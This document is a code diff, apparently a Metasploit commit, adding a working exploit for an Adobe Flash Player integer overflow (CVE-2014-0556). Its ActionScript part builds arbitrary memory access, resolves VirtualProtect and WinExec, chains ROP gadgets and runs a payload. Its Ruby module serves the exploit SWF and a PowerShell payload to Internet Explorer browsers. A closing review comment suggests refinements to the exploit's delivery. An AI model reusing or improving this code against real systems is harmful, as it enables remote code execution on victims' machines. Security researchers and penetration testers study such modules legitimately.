+ vector_write(vector_read(uv[i][0xfffffc08] + 0x40 - 1) + 16, 0xffffffff)
+ byte_write(uv[i][0] + 4, byte_read(uv[i][0] - 0x1000 + 8))
+ byte_write(uv[i][0])
+
+ var flash:uint = base(vtable)
+ var winmm:uint = module("winmm.dll", flash)
+ var kernel32:uint = module("kernel32.dll", winmm)
+ var virtualprotect:uint = procedure("VirtualProtect", kernel32)
+ var winexec:uint = procedure("WinExec", kernel32)
+ var xchgeaxespret:uint = gadget("c394", 0x0000ffff, flash)
+ var xchgeaxesiret:uint = gadget("c396", 0x0000ffff, flash)
+
+ byte_write(buffer + 0x30000, "\xb8", false); byte_write(0, vtable, false) // mov eax, vtable
+ byte_write(0, "\xbb", false); byte_write(0, main, false) // mov ebx, main
+ byte_write(0, "\x89\x03", false) // mov [ebx], eax
+ byte_write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+ byte_write(buffer + 0x100, payload, true)
+ byte_write(buffer + 0x20070, xchgeaxespret)
+ byte_write(buffer + 0x20000, xchgeaxesiret)
+ byte_write(0, virtualprotect)
+
+ // VirtualProtect
+ byte_write(0, winexec)
+ byte_write(0, buffer + 0x30000)
+ byte_write(0, 0x1000)
+ byte_write(0, 0x40)
+ byte_write(0, buffer + 0x80)
+
+ // WinExec
+ byte_write(0, buffer + 0x30000)
+ byte_write(0, buffer + 0x100)
+ byte_write(0)
+
+ byte_write(main, buffer + 0x20000)
+ this.toString()
+ }
+
+ private function vector_write(addr:uint, value:uint = 0):void
+ {
+ addr > uv[i][0] ? uv[i][(addr - uv[i][0]) / 4 - 2] = value : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1] = value
+ }
+
+ private function vector_read(addr:uint):uint
+ {
+ return addr > uv[i][0] ?
uv[i][(addr - uv[i][0]) / 4 - 2] : uv[i][0xffffffff - (uv[i][0] - addr) / 4 - 1]
+ }
+
+ private function byte_write(addr:uint, value:* = 0, zero:Boolean = true):void
+ {
+ if (addr) bv[6401].position = addr
+ if (value is String) {
+ for (var i:uint; i < value.length; i++) bv[6401].writeByte(value.charCodeAt(i))
+ if (zero) bv[6401].writeByte(0)
+ } else bv[6401].writeUnsignedInt(value)
+ }
+
+ private function byte_read(addr:uint, type:String = "dword"):uint
+ {
+ bv[6401].position = addr
+ switch(type) {
+ case "dword":
+ return bv[6401].readUnsignedInt()
+ case "word":
+ return bv[6401].readUnsignedShort()
+ case "byte":
+ return bv[6401].readUnsignedByte()
+ }
+ return 0
+ }
+
+ private function base(addr:uint):uint
+ {
+ addr &= 0xffff0000
+ while (true) {
+ if (byte_read(addr) == 0x00905a4d) return addr
+ addr -= 0x10000
+ }
+ return 0
+ }
+
+ private function module(name:String, addr:uint):uint
+ {
+ var iat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x80), i:int = -1
+ while (true) {
+ var entry:uint = byte_read(iat + (++i) * 0x14 + 12)
+ if (!entry) throw new Error("FAIL!");
+ bv[6401].position = addr + entry
+ if (bv[6401].readUTFBytes(name.length).toUpperCase() == name.toUpperCase()) break
+ }
+ return base(byte_read(addr + byte_read(iat + i * 0x14 + 16)))
+ }
+
+ private function procedure(name:String, addr:uint):uint
+ {
+ var eat:uint = addr + byte_read(addr + byte_read(addr + 0x3c) + 0x78)
+ var numberOfNames:uint = byte_read(eat + 0x18)
+ var addressOfFunctions:uint = addr + byte_read(eat + 0x1c)
+ var addressOfNames:uint = addr + byte_read(eat + 0x20)
+ var addressOfNameOrdinals:uint = addr + byte_read(eat + 0x24)
+ for (var i:uint = 0; ; i++) {
+ var entry:uint = byte_read(addressOfNames + i * 4)
+ bv[6401].position = addr + entry
+ if (bv[6401].readUTFBytes(name.length+2).toUpperCase() == name.toUpperCase()) break
+ }
+ return addr + byte_read(addressOfFunctions + byte_read(addressOfNameOrdinals + i * 2, "word") * 4)
+ }
+
+ private
function gadget(gadget:String, hint:uint, addr:uint):uint
+ {
+ var find:uint = 0
+ var limit:uint = byte_read(addr + byte_read(addr + 0x3c) + 0x50)
+ var value:uint = parseInt(gadget, 16)
+ for (var i:uint = 0; i < limit - 4; i++) if (value == (byte_read(addr + i) & hint)) break
+ return addr + i
+ }
+ }
+}
diff --git a/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
new file mode 100644
index 0000000000..668fecead7
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb
@@ -0,0 +1,110 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow',
+ 'Description' => %q{
+ This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs
+ in the copyPixelsToByteArray method from the BitmapData object. The position field of the
+ destination ByteArray can be used to cause an integer overflow and write contents out of
+ the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit),
+ IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit
+ 'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket
+ 'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it
+ 'juan vazquez' # msf module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2014-0556'],
+ ['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'],
+ ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'],
+ ['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'],
+ ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'],
+ ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'Platform' => 'win',
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => OperatingSystems::Match::WINDOWS_7,
+ :ua_name => Msf::HttpClients::IE,
+ :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <=
Gem::Version.new('14.0.0.176') },
+ :arch => ARCH_X86
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic', {} ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Sep 23 2014',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true})
+ b64_payload = Rex::Text.encode_base64(psh_payload)
+
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+
+end
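Review bot: The HTML response in `on_request_exploit` is sent with only `'Pragma' => 'no-cache'`, whereas the SWF branch a few lines above also sets `'Cache-Control' => 'no-cache, no-store'`; because `exploit_template` builds a fresh per-client payload and a random SWF name on every request, the HTML should be marked uncacheable the same way unless `send_exploit_html` already adds that header, e.g. `send_exploit_html(cli, exploit_template(cli, target_info), {'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})`. The SWF branch matches with `request.uri =~ /\.swf$/`, where `$` matches before an embedded newline rather than the end of the string; `request.uri =~ /\.swf\z/` is the anchor Ruby's style guide recommends for this kind of check. In `create_swf`, `swf = ::File.open(path, 'rb') { |f| swf = f.read }` works only because the block's value is returned, and the inner assignment is redundant; `swf = ::File.binread(path)` expresses the same thing in one call. Separately, the commit subject reads "CVE-2015-0556" while the module's reference, data path and description all say CVE-2014-0556.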